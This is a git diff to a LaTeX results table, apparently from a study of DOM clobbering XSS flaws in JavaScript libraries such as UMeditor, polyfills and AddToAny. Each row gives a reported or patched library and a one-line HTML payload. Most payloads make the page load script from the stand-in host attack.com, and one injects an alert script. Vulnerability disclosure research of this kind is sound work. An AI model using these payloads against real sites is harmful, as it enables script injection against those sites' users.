[Gadgets] Update the umeditor.md

--- a/table-rq1.tex
+++ b/table-rq1.tex
@@ -32,6 +32,7 @@ Mavo & 2.8K & v0.3.2 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name
 Stage.js & 2.4K & v1-alpha & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
 inspire.js & 1.7K & v1.10 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
 steal & 1.4K & v2.3.0 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://attack.com"\textgreater } \\ 
+UMeditor & 1.4K & v1.2.2 & XSS & Reported & \Circle &\CIRCLE & &\tightcode{<a id="UMEDITOR_HOME_URL" href="https://attack.com"\textgreater </a\textgreater } \\ 
 polyfills & 1.1K & v2.8.0 & XSS & Reported & \LEFTcircle &\CIRCLE & &\tightcode{<a id="ShadyDOM"\textgreater </a\textgreater <a id="ShadyDOM" name="force"\textgreater </a\textgreater <a id="WebComponents"\textgreater </a\textgreater <a id="WebComponents" name="root" href="https://attack.com"\textgreater </a\textgreater } \\ 
 doomcaptcha & 1K & latest & XSS & Reported & \LEFTcircle &\CIRCLE & &\tightcode{<img name="currentScript" label="<script\textgreater alert(1)</script\textgreater "\textgreater } \\ 
 AddToAny & N/A & N/A & XSS & Patched & \Circle &\CIRCLE & &\tightcode{<img name="currentScript" src="https://addtoany.attack.com } \\ 
